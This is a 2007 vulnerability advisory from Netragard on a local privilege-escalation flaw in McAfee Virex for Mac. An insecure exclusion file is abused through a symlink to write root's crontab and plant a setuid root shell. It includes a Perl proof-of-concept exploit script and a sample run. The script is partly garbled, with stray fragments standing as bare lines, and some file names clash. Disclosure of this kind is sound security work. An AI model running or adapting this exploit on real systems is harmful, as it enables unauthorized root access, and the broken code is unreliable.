-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
******************** Netragard, L.L.C Advisory********************
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."
[POSTING NOTICE]
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.
<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>
[About Netragard]
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.
[Advisory Information]
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070220
Product Name : McAfee VirusScan for Mac (Virex)
Product Version : <= Virex 7.7
Vendor Name : McAfee
Type of Vulnerability : Local root exploit and Scan Bypass
Effort : Easy
[Product Description]
Guard your Macintosh systems and users against all types of viruses and
malicious code, even new unknown threats with McAfee VirusScan for Mac."
[Technical Summary]
McAfee Virex contains an exploitable feature that enables users to
define what files should be excluded for scanning. This feature relies
on a configuration file with insecure privileges and is located in
/Library/Application Support. Any user on the system can modify or
delete the configuration file thus affecting what Virex will scan.
A simple example of such a modification would be to echo into the file
which in turn would cause Virex to ignore all files on the entire system.
[Technical Details]
An exploitable vulnerability exists in McAfee Virex that can be used to
gain root privileges on an affected system. This vulnerability exists
within the feature that enables users to define files for scan exclusion.
The configuration file used to store scan exclusion files has insecure
permissions of "rw-rw-rw" and as such can be modified or removed by any
user.
Upon system boot the VShieldCheck process that runs with root privileges
verifies the existence of the VShieldExecute.txt file located at:
/Library/Application/Sypport/Virex/VShieldExecute.txt
If VShieldCheck does not find the file at boot then it recreates the
file with the rw-rw-rw permissions. The exact command that it uses to
set those permissions is shown below:
SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod
/bin/chmod a+rw '%s' >/dev/null 2>&1
The VShieldCheck process does not check for symlinks prior to creating
the VShieldExecute.txt file. If an attacker creates a symlinks to:
/var/cron/tabs/root
from
/Library/Application Support/Virex/VShieldExclude.txt
then the file /var/cron/tabs/root will be created with writable
permissions by the VShieldCheck process at the next system boot.
Once the file is created the attacker can insert arbitrary commands
into the newly created cron file that will be executed with root
privileges.
Example:
SNOsoft-virexuser$ crontab -l
crontab: no crontab for virexuser
SNOsoft-virexuser$ Desktop/pwn_virex.pl
Usage: Desktop/pwn_virex.pl <target>
Targets:
0 . Virex 7.7.dmg
SNOsoft-virexuser$ Desktop/pwn_virex.pl 0
*** Target: Virex 7.7.dmg "/Library/Application
Support/Virex/VShieldExclude.txt"
wait for a reboot a cron run…
SNOsoft-virexuser$ crontab -l
After a reboot and a cycle of cron there will be a setuid root shell at
/Users/Shared/shX
[Proof Of Concept]
#!/usr/bin/perl
$dest = "/var/cron/tabs/root";
$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\" ";
unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
}
print "\n";
exit 1;
}
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id /Users/Shared/shX"); # this is for those
without gcc.
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root:
/Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' >
/var/cron/tabs/root\"\)\;\n";
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");
machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep
90; crontab /Users/Shared/xxx' >
/tmp/user_cron");
system("echo '* * * * * /usr/bin/id' > /Users/Shared/xxx");
system("crontab /tmp/user_cron");
print "wait for a reboot and a cron run…\n"
*** The code above will provide a root shell***
Note:
Netragard's SNOsoft Research Team was able to use this issue
perform privilege escalation and gain root privileges.
[Vendor Status]
Vendor Notified on 11/06/06
Vendor Patched on 02/13/07
Vendor advisory and patch has been posted at the following URL:
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=
518722&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=518722
McAfee engineers were very helpful throughout the entire process.
[Disclaimer]
<a href="http://www.netragard.com>
http://www.netragard.com
</a>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)
iD8DBQFF5LatQwbn1P9Iaa0RAojQAJ9VVWHCVnLDg2yG4KBt1crLC0+5NQCfZFQR
10JV11ASCMCVdPikVgMDzbk=
=Z34O
-----END PGP SIGNATURE-----